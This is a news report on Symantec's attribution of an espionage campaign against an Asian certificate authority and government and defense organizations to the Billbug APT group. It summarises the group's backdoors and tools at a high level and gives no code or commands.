As part of an ongoing effort that began at least in March 2022, a suspected Chinese state-sponsored actor compromised a digital certificate authority as well as government and defense organizations in many Asian nations. Through highlighting the usage of tools previously associated with this actor, Symantec, by Broadcom Software, connected the attacks to an adversarial organization it tracks by the moniker of Billbug.
Although no data is believed to have been taken up till now, espionage and data theft appear to be the driving forces behind the operation. The advanced persistent threat (APT) organization Billbug, also known as Bronze Elgin, Lotus Blossom, Lotus Panda, Spring Dragon, and Thrip, is thought to represent Chinese interests. South East Asian military and governmental institutions are the main targets.
The adversary used backdoors like Hannotog and Sagerunex in their 2019 attacks, which were launched against Hong Kong, Malaysia, Indonesia, Macau, the Philippines, and Vietnam. Even though the threat actor is known to use an information thief known as Catchamas to exfiltrate critical information in some circumstances, both implants are made to allow permanent remote access to the target network.
“The targeting of a certificate authority is notable, as if the attackers were able to successfully compromise it to access certificates they could potentially use them to sign malware with a valid certificate, and help it avoid detection on victim machines,” Symantec researchers said. “It could also potentially use compromised certificates to intercept HTTPS traffic.”
However, the cybersecurity firm pointed out that there is no proof that Billbug could compromise the digital certificates. It claimed that the action was reported to the relevant authority. According to an evaluation of the most recent wave of cyberattacks, the first access is probably gained by exploiting internet-facing apps. A combination of custom and off-the-shelf tools is then used to achieve its operational objectives.
This includes tools like WinRAR, Ping, Traceroute, NBTscan, Certutil, and a backdoor with the ability to download arbitrary files, acquire system data, and post encrypted data. Stowaway, an open-source multi-hop proxy tool, and Sagerunex, malware that infects computers via Hannotog, were also found to have been used in the assaults. On the other hand, the backdoor can execute available instructions, deliver new payloads, and siphon important files.
The researchers concluded that this threat organization still has a talented and resourceful operator capable of running long-lasting and extensive operations since they can compromise several victims at once. Billbug reuses tools associated with the organization in the past, suggesting that it is similarly unafraid of being implicated in this behavior.